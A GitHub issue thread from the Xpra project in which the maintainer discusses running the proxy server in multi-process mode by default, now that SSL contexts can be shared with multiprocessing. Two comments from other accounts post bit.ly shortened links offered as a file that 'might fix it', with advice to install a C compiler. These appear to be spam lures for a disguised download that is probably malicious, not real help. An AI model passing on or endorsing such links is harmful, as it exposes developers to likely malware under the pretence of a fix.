### ISSUE TITLE
multi-processing proxy server by default - even for ssl

### ISSUE THREAD

**Issue by totaam** [Xpra-org/xpra#4362]
It seems that the issue we were having must have been fixed.
[ssl sockets can't be serialized](https://github.com/python/cpython/issues/75012) but we [can share the ssl context with multiprocessing](https://stackoverflow.com/a/49021793)

**Comment by Ahmed-khalil3** [comment]
I think this will help you.
https://bit.ly/3TyLBMS

you may need to install the c compiler

**Comment by totaam** [comment]
Done, not tested MS Windows servers - so those still use threaded mode.

**Comment by Buqra55** [comment]
This might help:This file might fix it
https://bit.ly/4gx42eQ
If you don't have the c compliator, install it.(gcc or clang)
